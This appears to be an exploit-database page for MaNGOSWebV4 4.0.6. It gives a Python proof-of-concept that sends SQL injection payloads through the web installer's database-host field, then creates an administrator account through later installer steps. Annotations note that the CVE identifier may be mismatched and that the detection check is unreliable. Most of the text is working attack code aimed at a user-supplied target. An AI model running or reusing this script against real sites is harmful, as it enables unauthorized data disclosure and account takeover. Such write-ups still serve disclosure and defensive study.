| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| CVE-2017-6478 | 4 Dec 202521:02 | – | circl | |
| CVE-2017-6478 | 5 Mar 201720:00 | – | cve | |
| CVE-2017-6478 | 5 Mar 201720:00 | – | cvelist | |
| MaNGOSWebV4 4.0.6 - Reflected XSS | 3 Dec 202500:00 | – | exploitdb | |
| EUVD-2017-15535 | 7 Oct 202500:30 | – | euvd | |
| MaNGOSWebV4 < 4.0.8 - Cross-Site Scripting | 23 Jun 202605:08 | – | nuclei | |
| CVE-2017-6478 | 5 Mar 201720:59 | – | nvd | |
| CVE-2017-6478 | 5 Mar 201720:59 | – | osv | |
| 📄 MaNGOSWebV4 4.0.6 Cross Site Scripting | 4 Dec 202500:00 | – | packetstorm | |
| 📄 MaNGOSWeb 4.0.6 Host Header Injection / XML Injection | 27 Jan 202600:00 | – | packetstorm |
=============================================================================================================================================
| # Title : MaNGOSWeb V4 4.0.6 Sql Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://github.com/paintballrefjosh/MaNGOSWebV4/blob/master/install/index.php |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/212429/ & CVE-2017-6478
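[+] Summary : MaNGOSWebV4 version 4.0.6 suffers from a SQL injection vulnerability. The related entries listed at the top of this page (Exploit-DB, Nuclei) describe a cross-site scripting issue, so confirm against the CVE record that CVE-2017-6478 is the right identifier for this SQL injection claim.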
[+] POC :
#!/usr/bin/env python3
"""
Usage: python3 poc.py https://target.com
"""
import requests
import sys
import warnings
from urllib3.exceptions import InsecureRequestWarning
# Silence urllib3's InsecureRequestWarning. Every session created in this
# script sets verify=False, so TLS certificates are never validated and the
# warning would otherwise be emitted on each HTTPS request.
warnings.filterwarnings('ignore', category=InsecureRequestWarning)
def exploit_sqli(target_url):
"""Submit a UNION SELECT string as db_host to installer step 4 and print the error text.

Requests steps 1-3 of /install/index.php, then POSTs the database form to
step 4. If the response contains "MySql error log", the text between that
marker and the next "</div>" is printed and True is returned; every other
path returns False.

NOTE(review): indentation was lost when this listing was published, so the
nesting described here is inferred and the statements are left as found.
The success check only looks for the error-log marker, so it does not
distinguish injected query output from any other error the installer
reports. For defenders, the observable is unauthenticated traffic to
/install/index.php?step=N on a deployed site; removing or access-restricting
the install directory takes this endpoint away.
"""
# Session with certificate validation turned off for every request it makes
session = requests.Session()
session.verify = False # Disable SSL verification
try:
# Steps 1-3 are plain GETs; their responses are discarded
# Step 1: Access installer
session.get(f"{target_url}/install/index.php?step=1")
# Step 2
session.get(f"{target_url}/install/index.php?step=2")
# Step 3
session.get(f"{target_url}/install/index.php?step=3")
# Step 4 form: db_host carries the SQL fragment, the other fields are hard-coded
payload = {
'db_host': "localhost' UNION SELECT version(),user(),database(),@@datadir,'injected'-- -",
'db_port': '3306',
'db_username': 'root',
'db_password': 'test',
'db_name': 'realmd'
}
response = session.post(f"{target_url}/install/index.php?step=4", data=payload)
# Slice out what follows the marker; 22 is len("MySql error log:<br />")
if "MySql error log" in response.text:
start = response.text.find("MySql error log:<br />") + 22
end = response.text.find("</div>", start)
error_msg = response.text[start:end]
print("[+] Database information leaked:")
print(f" {error_msg}")
return True
# The second message announces a retry, but no further request is made in
# this handler, and verify is already False on the session
except requests.exceptions.SSLError as e:
print(f"[!] SSL Error: {e}")
print("[*] Trying with verify=False...")
return False
# Any other failure (connection refused, bad URL, ...) is reported and treated as "not exploited"
except Exception as e:
print(f"[!] Error: {e}")
return False
return False
def create_admin_account(target_url, username, password):
"""Walk the installer steps and submit an account form at step 6.

GETs steps 1-5 of /install/index.php, POSTs hard-coded database settings to
step 5, then POSTs `username` and `password` (as account / pass / pass2) to
step 6. Returns True if the step 6 response contains "Congradulations" or
"Congratulations", otherwise False.

NOTE(review): indentation was lost when this listing was published, so the
nesting described here is inferred and the statements are left as found.
The function sends no credential or token of its own, so it can only
succeed where the installer is still reachable and accepts these steps from
an anonymous client. For defenders: POSTs to step=5 or step=6 on an
already-installed site are the signal to alert on, and removing or
access-restricting the install directory removes the exposure.
"""
# Session with certificate validation turned off for every request it makes
session = requests.Session()
session.verify = False # Disable SSL verification
try:
# GET steps 1 through 5 in order; responses are discarded
for step in range(1, 6):
session.get(f"{target_url}/install/index.php?step={step}")
# Step 5 form: character, world and realm database settings, all hard-coded
step5_data = {
'char_db_host': 'localhost',
'char_db_port': '3306',
'char_db_username': 'mangos',
'char_db_password': 'mangos',
'char_db_name': 'characters',
'w_db_host': 'localhost',
'w_db_port': '3306',
'w_db_username': 'mangos',
'w_db_password': 'mangos',
'w_db_name': 'world',
'db_host': 'localhost',
'db_port': '3306',
'db_name': 'realmd',
'db_username': 'mangos',
'db_password': 'mangos'
}
session.post(f"{target_url}/install/index.php?step=5", data=step5_data)
# Step 6 form: the account name plus the password and its confirmation
step6_data = {
'account': username,
'pass': password,
'pass2': password
}
response = session.post(f"{target_url}/install/index.php?step=6", data=step6_data)
# Success is judged purely by a completion word in the page (both spellings are checked)
if "Congradulations" in response.text or "Congratulations" in response.text:
print(f"[+] Admin account created:")
print(f" Username: {username}")
print(f" Password: {password}")
return True
# Any failure is reported and treated as "account not created"
except Exception as e:
print(f"[!] Error creating account: {e}")
return False
return False
def simple_sql_injection_test(target_url):
"""POST three canned strings as db_host to installer step 4 and look for error text.

For each entry in `payloads`, submits the step 4 database form with that
string as db_host and a 10-second timeout. Returns True on the first
response whose lower-cased body contains "error" or "mysql"; returns False
if none does. Timeouts and other exceptions are printed per payload.

NOTE(review): indentation was lost when this listing was published, so the
nesting described here is inferred and the statements are left as found.
The match condition is very broad: any page that mentions MySQL or reports
any error satisfies it, so a True result is not evidence of injection and
should not be read as a confirmed finding.
"""
print(f"[*] Testing SQL Injection on {target_url}")
# (label, db_host value) pairs tried in order
payloads = [
("Basic Injection", "localhost' OR '1'='1"),
("Union Injection", "localhost' UNION SELECT 1,2,3,4,5-- -"),
("Error Based", "localhost' AND 1=CONVERT(int, @@version)-- -"),
]
session = requests.Session()
session.verify = False
# requests.Session does not read a `timeout` attribute; the per-call
# timeout=10 passed to post() below is what actually applies
session.timeout = 10
for payload_name, payload in payloads:
try:
# Same step 4 form each time; only db_host changes
data = {
'db_host': payload,
'db_port': '3306',
'db_username': 'root',
'db_password': 'test',
'db_name': 'realmd'
}
response = session.post(f"{target_url}/install/index.php?step=4",
data=data,
timeout=10)
# Broad substring match on the whole body - prone to false positives
if "error" in response.text.lower() or "mysql" in response.text.lower():
print(f"[+] Possible SQL Injection with {payload_name}")
return True
except requests.exceptions.Timeout:
print(f"[!] Timeout with {payload_name}")
except Exception as e:
print(f"[!] Error with {payload_name}: {e}")
return False
# Script entry point: takes one argument (the base URL) and runs the three
# functions above in sequence, printing the outcome of each.
# NOTE(review): indentation was lost when this listing was published; as far
# as the statement order shows, the later stages are not gated on the result
# of the first test, so all three sets of requests are sent on every run.
if __name__ == "__main__":
# Require the target URL; print usage and exit with status 1 otherwise
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <target_url>")
print(f"Example: {sys.argv[0]} http://localhost/mangosweb")
print(f"Example: {sys.argv[0]} https://127.0.0.1")
sys.exit(1)
target = sys.argv[1]
# Default to plain http:// when no scheme is given
if not target.startswith(('http://', 'https://')):
target = 'http://' + target
print(f"[*] Targeting: {target}")
print(f"[*] SSL Verification: DISABLED")
# Stage 1: the broad error-text check
if simple_sql_injection_test(target):
print("[+] SQL Injection vulnerability detected!")
else:
print("[-] No SQL Injection detected")
# Stage 2: the UNION SELECT form submission against step 4
print("\n[*] Attempting SQL Injection exploitation...")
if exploit_sqli(target):
print("[+] SQL Injection exploited successfully")
else:
print("[-] SQL Injection exploitation failed")
# Stage 3: installer account form with a fixed name and password; these
# constants are something a responder can search account records for
print("\n[*] Attempting to create admin account...")
if create_admin_account(target, "admin", "Admin123!"):
print("[+] Admin account created successfully")
else:
print("[-] Failed to create admin account")
print("\n[*] Attack completed")
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================